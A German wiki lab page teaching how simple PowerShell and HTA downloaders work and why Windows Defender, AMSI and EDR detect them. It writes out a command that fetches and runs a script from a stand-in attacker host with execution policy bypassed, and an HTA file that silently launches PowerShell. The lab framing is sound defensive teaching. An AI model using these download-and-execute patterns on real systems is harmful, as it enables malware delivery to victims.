PowerShell / HTA Payload Demonstration (Lab Only)

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Ziel der Übung

  • Verständnis, wie einfache Downloader technisch funktionieren
  • Erkennen, warum Windows Defender anschlägt
  • Einordnung der Rolle von EDR-Systemen
  • Demonstration ausschließlich in isolierter Test-VM ohne Internetzugang

Lab-Aufbau

  • Angreifer-VM: Kali Linux
  • Opfer-VM: Windows 10/11 mit aktiviertem Defender
  • Netzwerk: Internes Host-Only-Netz
  • Kein Zugriff ins Internet

Schritt 1 – Test-Webserver vorbereiten (Kali)

  • mkdir /tmp/xinux-demo
  • cd /tmp/xinux-demo
  • echo "Write-Output 'Download erfolgreich – Demo Script ausgeführt'" > demo.ps1
  • python3 -m http.server 8080
  • Der Webserver stellt eine harmlose PowerShell-Datei bereit.
  • Keine Schadfunktion – nur Ausgabe einer Meldung.

Schritt 2 – Einfacher PowerShell-Downloader (Windows VM)

  • Auf der Windows-VM PowerShell als normaler Benutzer starten.
  • Test-Download ausführen:
powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://<KALI-IP>:8080/demo.ps1')"
  • Erwartung:
  • Script wird geladen und ausgeführt.
  • Konsole zeigt die Testmeldung an.

Technische Erklärung

  • New-Object Net.WebClient erzeugt HTTP-Client
  • DownloadString lädt Script als Text
  • IEX (Invoke-Expression) führt den geladenen Code direkt im Speicher aus
  • Keine Datei wird zwingend auf Disk gespeichert

Warum Defender Alarm schlägt

  • Heuristische Erkennung: Kombination aus Download + IEX ist verdächtig
  • Signaturbasierte Mustererkennung für typische Downloader-Techniken
  • AMSI (Antimalware Scan Interface) scannt Script-Inhalte vor Ausführung
  • Verhaltensanalyse erkennt Netzwerk + Script-Ausführung

Demonstration Defender

  • Windows-Sicherheit öffnen
  • Viren- & Bedrohungsschutz → Schutzverlauf
  • Erkannte Bedrohung analysieren
  • Eintrag prüfen: Script oder verdächtiger Befehl

Variante mit HTA-Datei (nur Konzept)

  • Eine HTA-Datei ist eine HTML-Anwendung, die über mshta.exe ausgeführt wird.
  • HTA kann eingebettetes VBScript oder JScript enthalten.
  • Beim Start kann sie PowerShell aufrufen.
  • Beispielstruktur einer HTA-Datei:
<html>
<head>
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -Command Write-Output 'HTA gestartet'",0
</script>
</head>
<body></body>
</html>
  • Speichern als demo.hta
  • Start über Doppelklick

Warum HTA problematisch ist

  • mshta.exe ist signierte Windows-Komponente
  • Wird häufig für sogenannte "Living off the Land"-Techniken missbraucht
  • EDR erkennt Prozessketten:
mshta.exe → powershell.exe → Netzwerkzugriff

Rolle von EDR

  • Klassische AV: Signatur + einfache Heuristik
  • EDR: Prozessüberwachung + Telemetrie
  • Erkennt:
    • Eltern-Kind-Prozess-Beziehungen
    • Netzwerkverbindungen
    • Speicherbasierte Ausführung
    • Anomales Benutzerverhalten

Didaktischer Kern

  • Downloader selbst ist technisch trivial
  • Gefährlich wird es durch Kombination aus:
    • Social Engineering
    • legitimen Systemtools
    • Speicherbasierter Ausführung
  • Moderne Verteidigung analysiert Verhalten, nicht nur Dateien

Abschlussdiskussion

  • Warum Makros, HTA und PowerShell in Unternehmen eingeschränkt werden
  • Warum Application Control (z. B. AppLocker) sinnvoll ist
  • Warum Awareness-Schulung entscheidend bleibt

Wichtiger Hinweis

  • Nur in isolierter VM durchführen
  • Keine Tests gegen produktive Systeme
  • Keine Internet-Ziele verwenden
Abgerufen von „http://wiki.ixheim.de/index.php?title=PowerShell_/_HTA_Payload_Demonstration_(Lab_Only)&oldid=66801